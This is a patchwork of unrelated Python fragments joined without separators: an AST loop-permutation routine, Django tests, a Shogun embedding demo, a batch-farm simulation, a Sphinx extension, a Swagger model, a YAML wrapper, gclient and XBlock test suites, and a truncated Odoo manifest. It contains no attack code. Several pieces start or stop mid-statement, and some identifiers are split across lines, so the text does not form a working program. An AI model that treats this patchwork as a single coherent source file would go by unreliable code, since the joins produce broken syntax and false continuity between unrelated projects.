.init, module.loop.ast.BinOpExp) and cur_stmt.init.op_type == module.loop.ast.BinOpExp.EQ_ASGN and isinstance(cur_stmt.init.lhs, module.loop.ast.IdentExp)): iname = cur_stmt.init.lhs.name if iname in seen_loops: if all_unseen_optional: loop_body = cur_stmt break else:
print ('error:%s: loop "%s" cannot occur repeatedly' % (cur_stmt.line_no, iname)) sys.exit(1) if iname not in unseen_loops: if all_unseen_optional: loop_body = cur_stmt break else: print ('error:%s: loop "%s" is not specified in the loop order %s' % (cur_stmt.line_no, iname, tuple(loop_order))) sys.exit(1) linfo = loop_info[iname] linfo.append(cur_stmt.init) linfo.append(cur_stmt.test) linfo.append(cur_stmt.iter) unseen_loops.remove(iname) seen_loops.append(iname) cur_stmt = cur_stmt.stmt else: if all_unseen_optional: loop_body = cur_stmt break else: unfound_loops = filter(lambda x: not loop_info[x][0], unseen_loops) unfound_loops = tuple(unfound_loops) print ('error:%s: to-be-permuted loops %s do not exist' % (stmt.line_no, unfound_loops)) sys.exit(1) # generate the permuted loop transformed_stmt = loop_body rev_loop_order = loop_order[:] rev_loop_order.reverse() for iname in rev_loop_order: linfo = loop_info[iname] if len(linfo) > 1: opt, init_exp, test_exp, iter_exp = linfo transformed_stmt = module.loop.ast.ForStmt(init_exp.replicate(), test_exp.replicate(), iter_exp.replicate(), transformed_stmt) return transformed_stmt
import unittest from django.test.client import Client from django.forms import ValidationError from fields import MultipleEmailField class CaseTests(unittest.TestCase): def setUp(self): self.c = Client() self.case_id = 12345 self.status_codes = [301, 302] def test_cases(self): response = self.c.get('/cases/') try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_new(self): response = self.c.get('/case/new/') try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_clone(self): response = self.c.get('/cases/clone/', {'case': 12197}) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_cases_changestatus(self): response = self.c.get('/cases/changestatus/')
try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_cases_priority(self): response = self.c.get('/cases/priority/') try: self
.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_getcase(self): location = '/case/%s' % self.case_id response = self.c.get(location) if response.status_code == 301: print response.path try: self.assertEquals(response.status_code, 200) except AssertionError: assert response.status_code in self.status_codes def test_case_details(self): location = '/case/%s/details' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: assert response.status_code in self.status_codes # self.assertEquals(response.status_code, 302) def test_case_edit(self): location = '/case/%s/edit/' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_history(self): location = '/case/%s/history/' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_changecaseorder(self): location = '/case/%s/changecaseorder/' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_attachment(self): location = '/case/%s/attachment/' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_log(self): location = '/case/%s/log/' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_bug(self): location = '/case/%s/bug/' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) def test_case_plan(self): location = '/case/%s/plan/' % self.case_id response = self.c.get(location) try: self.assertEquals(response.status_code, 200) except AssertionError: self.assertEquals(response.status_code, 302) class Test_MultipleEmailField(unittest.TestCase): def setUp(self): self.default_delimiter = ',' self.field = MultipleEmailField(delimiter=self.default_delimiter) self.all_valid_emails = ( 'cqi@redhat.com', 'cqi@yahoo.com', 'chen@gmail.com', ) self.include_invalid_emails = ( '', ' cqi@redhat.com', 'chen@sina.com', ) def test_to_python(self): value = 'cqi@redhat.com' pyobj = self.field.to_python(value) self.assertEqual(pyobj, ['cqi@redhat.com']) value = 'cqi@redhat.com,,cqi@gmail.com,' pyobj = self.field.to_python(value) self.assertEqual(pyobj, ['cqi@redhat.com', 'cqi@gmail.com']) for value in ('', None, []): pyobj = self.field.to_python(value) self.assertEqual(pyobj, []) def test_clean(self): value = 'cqi@redhat.com' data = self.field.clean(value) self.assertEqual(data, ['cqi@redhat.com']) value = 'cqi@redhat.com,cqi@gmail.com' data = self.field.clean(value) self.assertEqual(data, ['cqi@redhat.com', 'cqi@gmail.com']) value = ',cqi@redhat.com, ,cqi@gmail.com, \n' data = self.field.clean(value) self.assertEqual(data, ['cqi@redhat.com', 'cqi@gmail.com']) value = ',cqi,cqi@redhat.com, \n,cqi@gmail.com, ' self.assertRaises(ValidationError, self.field.clean, value) value = '' self.field.required = True self.assertRaises(ValidationError, self.field.clean, value) value = '' self.field.required = False data = self.field.clean(value) self.assertEqual(data, []) if __name__ == '__main__': unittest.main()
""" Shogun demo Fernando J. Iglesias Garcia This example shows the use of dimensionality reduction methods, mainly Stochastic Proximity Embedding (SPE), although Isomap is also used for comparison. The data selected to be embedded is an helix. Two different methods of SPE (global and local) are applied showing that the global method outperforms the local one in this case. Actually the results of local SPE are fairly poor for this input. Finally, the reduction achieved with Isomap is better than the two previous ones, more robust against noise. Isomap exploits the parametrization of the input data. """ import math import mpl_toolkits.mplot3d as mpl3 import numpy as np import pylab import util from modshogun import RealFeatures from modshogun import StochasticProximityEmbedding, SPE_GLOBAL from modshogun import SPE_LOCAL, Isomap # Number of data points N = 500 # Generate helix t = np.linspace(1, N, N).T / N t = t*2*math.pi X = np.r_[ [ ( 2 + np.cos(8*t) ) * np.cos(t) ], [ ( 2 + np.cos(8*t) ) * np.sin(t) ], [ np.sin(8*t) ] ] # Bi-color helix labels = np.round( (t*1.5) ) % 2 y1 = labels == 1 y2 = labels == 0 # Plot helix fig = pylab.figure() fig.add_subplot(2, 2, 1, projection = '3d') pylab.plot(X[0, y1], X[1, y1], X[2, y1], 'ro') pylab.plot(X[0, y2], X[1, y2], X[2, y2], 'go') pylab.title('Original 3D Helix') # Create features instance features = RealFeatures(X) # Create Stochastic Proximity Embedding converter instance converter = StochasticProximityEmbedding() # Set target dimensionality converter.set_target_dim(2) # Set strategy converter.set_strategy(SPE_GLOBAL) # Compute SPE embedding embedding = converter.embed(features) X = embedding.get_feature_matrix() fig.add_subplot(2, 2, 2) pylab.plot(X[0, y1], X[1, y1], 'ro')
pylab.plot(X[0, y2], X[1, y2], 'go') pylab.title('SPE with global strategy') # Compute a second SPE embedding with local strategy converter.set_stra
tegy(SPE_LOCAL) converter.set_k(12) embedding = converter.embed(features) X = embedding.get_feature_matrix() fig.add_subplot(2, 2, 3) pylab.plot(X[0, y1], X[1, y1], 'ro') pylab.plot(X[0, y2], X[1, y2], 'go') pylab.title('SPE with local strategy') # Compute Isomap embedding (for comparison) converter = Isomap() converter.set_target_dim(2) converter.set_k(6) embedding = converter.embed(features) X = embedding.get_feature_matrix() fig.add_subplot(2, 2, 4) pylab.plot(X[0, y1], X[1, y1], 'ro') pylab.plot(X[0, y2], X[1, y2], 'go') pylab.title('Isomap') pylab.connect('key_press_event', util.quit) pylab.show()
#!/usr/bin/python import computefarm as cf from computefarm.farm import depth_first, breadth_first import random import logging import numpy as np HOUR = 60 * 60 default_queue_properties = { 'grid': { 'num': 0, 'mem': 750, 'avg': HOUR, 'std': 0.6 * HOUR}, 'prod': { 'num': 0, 'avg': 8 * HOUR, 'std': 3 * HOUR}, 'short': { 'num': 500, 'avg': 1.2 * HOUR, 'std': 600}, 'long': { 'num': 500, 'avg': 5 * HOUR, 'std': 2 * HOUR}, 'test': { 'num': 0, 'avg': 8 * HOUR, 'cpu': 3}, 'mp8': { 'num': 0, 'avg': 6 * HOUR, 'std': 4 * HOUR, 'cpu': 8, 'mem': 6000} } def sort_like(array, like): # All items in @like are picked in order if they exist in the array for x in like: if x in array: yield x # All the remaining are picked here for x in sorted(set(array) - set(like)): yield x log = logging.getLogger('sim') class Simulation(object): def __init__(self, nodes, negotiate_interval=150, stat_freq=10, submit_interval=200): """ Initialize the farm simulation, attach groups and queues to it and provide method of submitting jobs of a predetermined size into the queues. """ self.farm = cf.Farm() # Distribution of farm nodes, e.g. 331/90 is ratio of 24/32 core machines dist = ( (24, 331), (32, 90), (8, 238), ) self.farm.generate_from_dist(dist, size=nodes) root = self.setup_groups(cf.Group('<root>')) self.farm.attach_groups(root) self._init_stat(stat_freq * 100) #Default ranking self.farm.set_negotiatior_rank(depth_first) se
lf.queue = cf.JobQueue() self.farm.attach_queue(self.queue) # How many seconds per negotiation/stat gathering cycle self.int_stat = stat_freq self.int_negotiate = negotiate_interval self.int_submit = submit_interval self.next_stat = 0 self.next_negotiate = 0 self.next_submit = 0 # How many seconds to simulate each step self.sec_per_step = 5 # these two
_set* knobs are used in callbacks by the GUI def _set_neg_df(self): self.farm.set_negotiatior_rank(depth_first) def _set_neg_bf(self): self.farm.set_negotiatior_rank(breadth_first) def _init_stat(self, hist_size): """ Statistics are kept in a constant-size numpy array that is updated periodically """ self._stat = {} self._stat_size = hist_size for x in self.farm.groups.active_groups(): self._stat[x.name] = np.zeros((hist_size), int) def _update_stat(self): self.farm.update_usage() for g in self.farm.groups.active_groups(): # Left-shift entire array back by one, so element n -> element n - 1 self._stat[g.name] = np.roll(self._stat[g.name], -1) # New last element is current update self._stat[g.name][-1] = g.usage def setup_groups(self, root): """ Reflects current ATLAS group structure: /- atlas +-- production +-- prod | | | | | \-- mp8 | | | | | \-- test <root>-+ | | \-- analysis +-- short | | | \-- long \- grid """ root.add_child('atlas') root.add_child('grid', 3) root['atlas'].add_child('production') root['atlas'].add_child('analysis') root['atlas']['production'].add_child('prod', 40) root['atlas']['production'].add_child('mp8', 5) root['atlas']['production'].add_child('test', 7) root['atlas']['analysis'].add_child('short', 10) root['atlas']['analysis'].add_child('long', 10) # Populate with default properties from top of this module for x in root.walk(): if x.name in default_queue_properties: x.set_character(**default_queue_properties[x.name]) return root def add_jobs(self): """ Submit more jobs into the queue, keeping the total idle jobs where they should be according to the sliders in the GUI. """ for group in self.farm.groups.active_groups(): num_submit = group.num - self.farm.queue.get_group_idle(group.name) if num_submit <= 0: continue log.info("Submitting %d more %s jobs", num_submit, group.name) for n in xrange(num_submit): # Job length is random within a Gaussian distribution length = abs(random.gauss(group.avg, group.std)) # Create job object and add it to queue job = cf.BatchJob(group=group.name, cpus=group.cpu, memory=group.mem, length=length) self.queue.add_job(job) def step(self, dt): """ Advance time of the simulation by dt steps at a time, making next submission/negotiation/statistics-gathering as appropriate """ for i in xrange(dt): self.farm.advance_time(self.sec_per_step) if self.farm.time > self.next_submit: self.add_jobs() self.next_submit = self.farm.time + self.int_submit if self.farm.time > self.next_negotiate: self.farm.negotiate_jobs() self.next_negotiate = self.farm.time + self.int_negotiate if self.farm.time > self.next_stat: self._update_stat() self.next_stat = self.farm.time + self.int_stat def display_order(self): sort_order = ('short', 'long', 'test', 'prod', 'mp8') return list(sort_like(self._stat.keys(), sort_order)) def make_plotdata(self, groups='all'): x = np.arange(self._stat_size) if groups == 'all': y = np.vstack((self._stat[x] for x in self.display_order())) else: y = np.vstack((self._stat[x] for x in self.display_order() if x in groups)) return x, y if __name__ == '__main__': s = Simulation()
# Note: Modified by Neui (Note: sphinx.util.compat.Directive is deprecated) # # Copyright (C) 2011 by Matteo Franchin # # This file is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This file is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # A copy of the GNU General Public License is available at # <http://www.gnu.org/licenses/>. from sphinx.builders.singlehtml import SingleFileHTMLBuilder from docutils import nodes from docutils.parsers.rst import Directive, directives import re class globalindex(nodes.General, nodes.Element): pass def visit_globalindex_node(self, node): self.body.append(node['content']) def depart_globalindex_node(self, node): pass class GlobalIndexDirective(Directive): required_arguments = 0 optional_arguments = 1 final_argument_whitespace = True option_spec = \ {'maxdepth': directives.nonnegative_int, 'collapse': directives.flag, 'titlesonly': directives.flag} def run(self): node = globalindex('') node['maxdepth'] = self.options.get('maxdepth', 2) node['collapse'] = 'collapse' in self.options node['titlesonly'] = 'titlesonly' in self.options return [node] def process_globalindex_nodes(app, doctree, fromdocname): bui
lder = app.builder if builder.name != SingleFileHTMLBuilder.name: for node in doctree.traverse(globalindex): node.parent.remove(node) else: docname = builder.config.master_doc for node in doctree.traverse(globalindex): kwargs = dict(
maxdepth=node['maxdepth'], collapse=node['collapse'], titles_only=node['titlesonly']) rendered_toctree = builder._get_local_toctree(docname, **kwargs) # For some reason, it refers to docname.html#anchor, where just # #anchor is enough. rendered_toctree = rendered_toctree.replace(docname + ".html", '') # Subsections will be #section#subsection, which is invalid. # Removing the first #section fixes this. rendered_toctree = re.sub('href="(?:#[^#"]+)*(#[^"]+)"', \ 'href="\\1"', rendered_toctree) node['content'] = rendered_toctree def setup(app): app.add_node(globalindex, html=(visit_globalindex_node, depart_globalindex_node)) app.add_directive('globalindex', GlobalIndexDirective) app.connect('doctree-resolved', process_globalindex_nodes)
# coding: utf-8 """ MINDBODY Public API No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501 OpenAPI spec version: v6 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class Resource(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'id': 'int', 'name': 'str' } attribute_map = { 'id': 'Id', 'name': 'Name' } def __init__(self, id=None, name=None): # noqa: E501 """Resource - a model defined in Swagger""" # noqa: E501 self._id = None self._name = None self.discriminator = None if id is not None: self.id = id if name is not None: self.name = name @property def id(self): """Gets the id of this Resource. # noqa: E501 The ID of the resource. # noqa: E501 :return: The id of this Resource. # noqa: E501 :rtype: int """ return self._id @id.setter def id(self, id): """Sets the id of this Resource. The ID of the resource. # noqa: E501 :param id: The id of this Resource. # noqa: E501 :type: int """ self._id = id @property def name(self): """Gets the name of this Resource. # noqa: E501 The name of the resource. # noqa: E501 :return: The name of this Resource. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this Resource. The name of the resource. # noqa: E501 :param name: The name of this Resource. # noqa: E501 :type: str """ self._name = name def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iterite
ms(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value ))
elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(Resource, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, Resource): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
from django.utils import unittest from djan
go.contrib import admin from hyperadmin.sites import ResourceSite class SiteTestCase(unittest.TestCase): def test_install_from_admin_site(self): site = ResourceSite() admin.autodiscover()
site.install_models_from_site(admin.site) self.assertTrue(site.registry)
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import ruamel.yaml def none_representer(dumper, data): return dumper.represent_scalar('tag:yaml.org,2002:null', 'null') class YAML(object): def __init__(self): """Wrap construction of ruamel yaml object.""" se
lf.yaml = ruamel.yaml.YAML() self.yaml.allow_duplicate_keys = True self.yaml.representer.add_representer(type(None), none_representer) self.yaml.indent(mapping=2, sequence=4, offset=2) def load(self, stream): return self.yaml.load(stream) def tr(self, x): x = x.replace('\n-', '\n\n-') newlines = [] for line in x.split('\n'): if '#' in line: newlines.append(l
ine) else: newlines.append(line[2:]) return '\n'.join(newlines) def dump(self, data, *args, **kwargs): if isinstance(data, list): kwargs['transform'] = self.tr self.yaml.dump(data, *args, **kwargs) _yaml = YAML() def load(*args, **kwargs): return _yaml.load(*args, **kwargs) def dump(*args, **kwargs): return _yaml.dump(*args, **kwargs)
e self.assertTrue(exception_raised) def testTargetOsInDepsFile(self): """Verifies that specifying a target_os value in a DEPS file pulls in all relevant dependencies. The target_os variable in a DEPS file allows specifying the name of an additio
nal OS which should be considered when selecting dependencies from a DEPS' deps_os. The value will be appended to the _enforced_os tuple. """ write( '.gclient', 'solutions = [\n' ' { "name": "foo",\n' ' "url": "svn://example.com/foo",\n' ' },\n' ' { "name": "bar",\n' ' "url": "svn://example.com/bar",\n' ' }]\n') write( os.path.join('foo', 'DEPS'), 'target_os = ["baz"]\n' 'deps_os = {\n'
' "unix": { "foo/unix": "/unix", },\n' ' "baz": { "foo/baz": "/baz", },\n' ' "jaz": { "foo/jaz": "/jaz", },\n' '}') write( os.path.join('bar', 'DEPS'), 'deps_os = {\n' ' "unix": { "bar/unix": "/unix", },\n' ' "baz": { "bar/baz": "/baz", },\n' ' "jaz": { "bar/jaz": "/jaz", },\n' '}') parser = gclient.OptionParser() options, _ = parser.parse_args(['--jobs', '1']) options.deps_os = 'unix' obj = gclient.GClient.LoadCurrentConfig(options) obj.RunOnDeps('None', []) self.assertEqual(['unix'], sorted(obj.enforced_os)) self.assertEquals( [ ('bar', 'svn://example.com/bar'), ('bar/unix', 'svn://example.com/bar/unix'), ('foo', 'svn://example.com/foo'), ('foo/baz', 'svn://example.com/foo/baz'), ('foo/unix', 'svn://example.com/foo/unix'), ], sorted(self._get_processed())) def testUpdateWithOsDeps(self): """Verifies that complicated deps_os constructs result in the correct data also with multple operating systems. Also see testDepsOsOverrideDepsInDepsFile.""" test_data = [ # Tuples of deps, deps_os, os_list and expected_deps. ( # OS doesn't need module. {'foo': 'default_foo'}, {'os1': { 'foo': None } }, ['os1'], {'foo': None} ), ( # OS wants a different version of module. {'foo': 'default_foo'}, {'os1': { 'foo': 'os1_foo'} }, ['os1'], {'foo': 'os1_foo'} ), ( # OS with no overrides at all. {'foo': 'default_foo'}, {'os1': { 'foo': None } }, ['os2'], {'foo': 'default_foo'} ), ( # One OS doesn't need module, one OS wants the default. {'foo': 'default_foo'}, {'os1': { 'foo': None }, 'os2': {}}, ['os1', 'os2'], {'foo': 'default_foo'} ), ( # One OS doesn't need module, another OS wants a special version. {'foo': 'default_foo'}, {'os1': { 'foo': None }, 'os2': { 'foo': 'os2_foo'}}, ['os1', 'os2'], {'foo': 'os2_foo'} ), ( # One OS wants to add a module. {'foo': 'default_foo'}, {'os1': { 'bar': 'os1_bar' }}, ['os1'], {'foo': 'default_foo', 'bar': 'os1_bar'} ), ( # One OS wants to add a module. One doesn't care. {'foo': 'default_foo'}, {'os1': { 'bar': 'os1_bar' }}, ['os1', 'os2'], {'foo': 'default_foo', 'bar': 'os1_bar'} ), ( # Two OSes want to add a module with the same definition. {'foo': 'default_foo'}, {'os1': { 'bar': 'os12_bar' }, 'os2': { 'bar': 'os12_bar' }}, ['os1', 'os2'], {'foo': 'default_foo', 'bar': 'os12_bar'} ), ] for deps, deps_os, target_os_list, expected_deps in test_data: orig_deps = copy.deepcopy(deps) result = gclient.Dependency.MergeWithOsDeps(deps, deps_os, target_os_list) self.assertEqual(result, expected_deps) self.assertEqual(deps, orig_deps) def testLateOverride(self): """Verifies expected behavior of LateOverride.""" url = "git@github.com:dart-lang/spark.git" d = gclient.Dependency(None, 'name', 'url', None, None, None, None, None, '', True, False) late_url = d.LateOverride(url) self.assertEquals(url, late_url) def testDepsOsOverrideDepsInDepsFile(self): """Verifies that a 'deps_os' path can override a 'deps' path. Also see testUpdateWithOsDeps above. """ write( '.gclient', 'solutions = [\n' ' { "name": "foo",\n' ' "url": "svn://example.com/foo",\n' ' },]\n') write( os.path.join('foo', 'DEPS'), 'target_os = ["baz"]\n' 'deps = {\n' ' "foo/src": "/src",\n' # This path is to be overridden by similar path # in deps_os['unix']. '}\n' 'deps_os = {\n' ' "unix": { "foo/unix": "/unix",' ' "foo/src": "/src_unix"},\n' ' "baz": { "foo/baz": "/baz",\n' ' "foo/src": None},\n' ' "jaz": { "foo/jaz": "/jaz", },\n' '}') parser = gclient.OptionParser() options, _ = parser.parse_args(['--jobs', '1']) options.deps_os = 'unix' obj = gclient.GClient.LoadCurrentConfig(options) obj.RunOnDeps('None', []) self.assertEqual(['unix'], sorted(obj.enforced_os)) self.assertEquals( [ ('foo', 'svn://example.com/foo'), ('foo/baz', 'svn://example.com/foo/baz'), ('foo/src', 'svn://example.com/foo/src_unix'), ('foo/unix', 'svn://example.com/foo/unix'), ], sorted(self._get_processed())) def testRecursionOverride(self): """Verifies gclient respects the |recursion| var syntax. We check several things here: - |recursion| = 3 sets recursion on the foo dep to exactly 3 (we pull /fizz, but not /fuzz) - pulling foo/bar at recursion level 1 (in .gclient) is overriden by a later pull of foo/bar at recursion level 2 (in the dep tree) """ write( '.gclient', 'solutions = [\n' ' { "name": "foo", "url": "svn://example.com/foo" },\n' ' { "name": "foo/bar", "url": "svn://example.com/bar" },\n' ']') write( os.path.join('foo', 'DEPS'), 'deps = {\n' ' "bar": "/bar",\n' '}\n' 'recursion = 3') write( os.path.join('bar', 'DEPS'), 'deps = {\n' ' "baz": "/baz",\n' '}') write( os.path.join('baz', 'DEPS'), 'deps = {\n' ' "fizz": "/fizz",\n' '}') write( os.path.join('fizz', 'DEPS'), 'deps = {\n' ' "fuzz": "/fuzz",\n' '}') options, _ = gclient.OptionParser().parse_args([]) obj = gclient.GClient.LoadCurrentConfig(options) obj.RunOnDeps('None', []) self.assertEquals( [ ('foo', 'svn://example.com/foo'), ('foo/bar', 'svn://example.com/bar'), ('bar', 'svn://example.com/foo/bar'), ('baz', 'svn://example.com/foo/bar/baz'), ('fizz', 'svn://example.com/foo/bar/baz/fizz'), ], self._get_processed()) def testRecursedepsOverride(self): """Verifies gclient respects the |recursedeps| var syntax. This is what we mean to check here: - |recursedeps| = [...] on 2 levels means we pull exactly 3 deps (up to /fizz, but not /fuzz) - pulling foo/bar with no recursion (in .gclient) is overriden by a later pull of foo/bar with recursion (in the dep tree) - pulling foo/tar with no recursion (in .gclient) is no recursively pulled (taz is left out) """ write( '.gclient', 'solutions = [\n' ' { "name": "foo", "url": "svn://example.com/foo" },\n' ' { "name": "foo/bar", "url": "svn://example.com/bar" },\n' ' { "name": "foo/tar", "url": "svn://example.com/tar" },\n' ']') write( os.path.join('foo', 'DEPS'), 'deps = {\n' ' "bar": "/bar",\n' '}\n' 'recursedeps = ["bar"]') write( os.path.join('b
scope=Scope.settings, name='') settings_lst = List(scope=Scope.settings, name='') uss_lst = List(scope=Scope.user_state_summary, name='') user_lst = List(scope=Scope.user_state, name='') pref_lst = List(scope=Scope.preferences, name='') user_info_lst = List(scope=Scope.user_info, name='') sids = ScopeIds(user_id="_bob", block_type="b.12#ob", def_id="..", usage_id="..") field_data = DictFieldData({}) runtime = TestRuntime(Mock(), services={'field-data': field_data}) block = TestBlock(runtime, None, sids) # Format: usage or block ID/field_name/user_id for item, correct_key in [[TestBlock.field_x, "__..../field__x/NONE.NONE"], [TestBlock.user_info_lst, "NONE.NONE/user__info__lst/____bob"], [TestBlock.pref_lst, "b..12_35_ob/pref__lst/____bob"], [TestBlock.user_lst, "__..../user__lst/____bob"], [TestBlock.uss_lst, "__..../uss__lst/NONE.NONE"], [TestBlock.settings_lst, "__..../settings__lst/NONE.NONE"]]: key = scope_key(item, block) assert_equals(key, correct_key) def test_field_display_name(): attempts = Integer(display_name='Maximum Problem Attempts') attempts._name = "max_problem_attempts" assert_equals("Maximum Problem Attempts", attempts.display_name) boolean_field = Boolean(display_name="boolean field") assert_equals("boolean field", boolean_field.display_name) class TestBlock(XBlock): """ Block for testing """ field_x = List(display_name="Field Known as X") assert_equals("Field Known as X", TestBlock.field_x.display_name) def test_unique_id_default(): class TestBlock(XBlock): """ Block for testing """ field_a = String(default=UNIQUE_ID, scope=Scope.settings) field_b = String(default=UNIQUE_ID, scope=Scope.user_state) sids = ScopeIds(user_id="bob", block_type="bobs-type", def_id="definition-id", usage_id="usage-id") runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids) unique_a = block.field_a unique_b = block.field_b # Create another instance of the same block. Unique ID defaults should not change. runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids) assert_equals(unique_a, block.field_a) assert_equals(unique_b, block.field_b) # Change the user id. Unique ID default should change for field_b with # user_state scope, but not for field_a with scope=settings. runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids._replace(user_id='alice')) assert_equals(unique_a, block.field_a) assert_not_equals(unique_b, block.field_b) # Change the usage id. Unique ID default for both fields should change. runtime = TestRuntime(services={'field-data': DictFieldData({})}) block = TestBlock(runtime, DictFieldData({}), sids._replace(usage_id='usage-2')) assert_not_equals(unique_a, block.field_a) assert_not_equals(unique_b, block.field_b) def test_values(): # static return value field_values = ['foo', 'bar'] test_field = String(values=field_values) assert_equals(field_values, test_field.values) # function to generate values test_field = String(values=lambda: [1, 4]) assert_equals([1, 4], test_field.values) # default if nothing specified assert_equals(None, String().values) def test_values_boolean(): # Test Boolean, which has values defined test_field = Boolean() assert_equals( ({'display_name': "True", "value": True}, {'display_name': "False", "value": False}), test_field.values ) def test_values_dict(): # Test that the format expected for integers is allowed test_field = Integer(values={"min": 1, "max": 100}) assert_equals({"min": 1, "max": 100}, test_field.values) def test_set_incomparable_fields(): # if we can't compare a field's value to the value it's going to be reset to # (i.e. timezone aware and unaware datetimes), just reset the value. class FieldTester(XBlock): """Test block for this test.""" incomparable = Field(scope=Scope.settings) not_timezone_aware = dt.datetime(2015, 1, 1) timezone_aware = dt.datetime(2015, 1, 1, tzinfo=pytz.UTC) runtime = TestRuntime(services={'field-data': DictFieldData({})}) field_tester = FieldTester(runtime, scope_ids=Mock(spec=ScopeIds)) field_tester.incomparable = not_timezone_aware field_tester.incomparable = timezone_aware assert_equals(field_tester.incomparable, timezone_aware) def test_twofaced_field_access(): # Check that a field with different to_json and from_json representations # persists and saves correctly. class TwoFacedField(Field): """A field that emits different 'json' than it parses.""" def from_json(self, thestr): """Store an int, the length of the string parsed.""" return len(thestr) def to_json(self, value): """Emit some number of X's.""" return "X" * value class FieldTester(XBlock): """Test block for TwoFacedField.""" how_many = TwoFacedField(scope=Scope.settings) original_json = "YYY" runtime = TestRuntime(services={'field-data': DictFieldData({'how_many': original_json})}) field_tester = FieldTester(runtime, scope_ids=Mock(spec=ScopeIds)) # Test that the native value isn't equal to the original json we specified. assert_not_equals(field_tester.how_many, original_json) # Test that the native -> json value isn't equal to the original json we specified. assert_not_equals(TwoFacedField().to_json(field_tester.how_many), original_json) # The previous accesses will mark the field as dirty (via __get__) assert_equals(len(field_tester._dirty_fields), 1)
# However, the field should not ACTUALLY be marked as a field that is needing to be saved. assert_not_in('how_many', field_tester._get_fields_to_save()) # pylint: disable=W0212 def test_setting_the_same_value_marks_field_as_dirty(): """ Check that setting field to the same value marks mutable fields as dirty. However, since the value has
n't changed, these fields won't be saved. """ class FieldTester(XBlock): """Test block for set - get test.""" non_mutable = String(scope=Scope.settings) list_field = List(scope=Scope.settings) dict_field = Dict(scope=Scope.settings) runtime = TestRuntime(services={'field-data': DictFieldData({})}) field_tester = FieldTester(runtime, scope_ids=Mock(spec=ScopeIds)) # precondition checks assert_equals(len(field_tester._dirty_fields), 0) assert_false(field_tester.fields['list_field'].is_set_on(field_tester)) assert_false(field_tester.fields['dict_field'].is_set_on(field_tester)) assert_false(field_tester.fields['non_mutable'].is_set_on(field_tester)) field_tester.non_mutable = field_tester.non_mutable field_tester.list_field = field_tester.list_field field_tester.dict_field = field_tester.dict_field assert_not_in(field_tester.fields['non_mutable'], field_tester._dirty_fields) assert_in(field_tester.fields['list_field'], field_tester._dirty_fields) assert_in(field_tester.fields['dict_field'], field_tester._dirty_fields) assert_false(field_tester.fields['non_mutable'].is_set_on(field_tester)) assert_false(field_tester.fields['list_field'].is_set_on(field_tester)) assert_false(field_tester.fields['dict_field'].is_set_on(field_tester)) class SentinelTest(unittest.TestCase): """ Tests of :ref:`xblock.fields.Sentinel`. """ def test_equality(self): base = Sentinel('base') self.assertEquals(base, base) self.assertEquals(base, Sentinel('
# -*- coding: utf-8 -*- # (c) 2015 Antiun Ingeniería S.L. - Pedro M. Baeza # (c) 2015 Av
anzOSC - Ainara Galdona # License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0 { "name": "AEAT - Prorrata de IVA", "version": "8.0.2.0.0", "license": "AGPL-3", "author": "AvanzOSC, " "Antiun Ingeniería S.L., " "Serv. Tecnol. Avanzados - Pedro M. Baeza, " "Odoo Community Association (OCA)", "website": "https://github.com/OCA/l10n-spain", "category": "Accounting", "depends": [ 'l10n_es_aeat_mod30
